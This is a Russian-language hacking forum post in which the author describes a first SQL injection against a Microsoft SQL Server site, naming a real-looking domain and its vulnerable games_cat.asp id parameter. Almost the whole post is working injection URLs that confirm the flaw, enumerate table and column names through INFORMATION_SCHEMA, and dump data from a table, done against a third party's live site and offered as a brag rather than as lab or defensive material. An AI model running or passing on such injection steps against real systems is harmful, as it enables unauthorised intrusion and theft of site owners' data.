08.10.2007, 01:21
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
моя первая инъекция в MSSQL
нашёл:
Код:
http://www.asprilexi.com/games_cat.asp?id=1'
проверил:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=@@version--
схема таблес:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
выбрал табличку.. лень было искать реальное чтобибудь типа "users" так что выбрал просто не ту что сначала.
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('kartasub','cyfd','dtproperties','erevna','static','sysconstraints','syssegments','var','ahcmd','anikei','apostoli','banner','cardview','choice','comd_list','D99_CMD'))--
колонки:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='D99_REG'+AND+COLUMN_NAME+NOT+IN+('data'))--
вывод:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+data+from+D99_REG)--
какойто хз какой язык, поэтому нихрена непонятно.. ну и фик с ним) |
|
|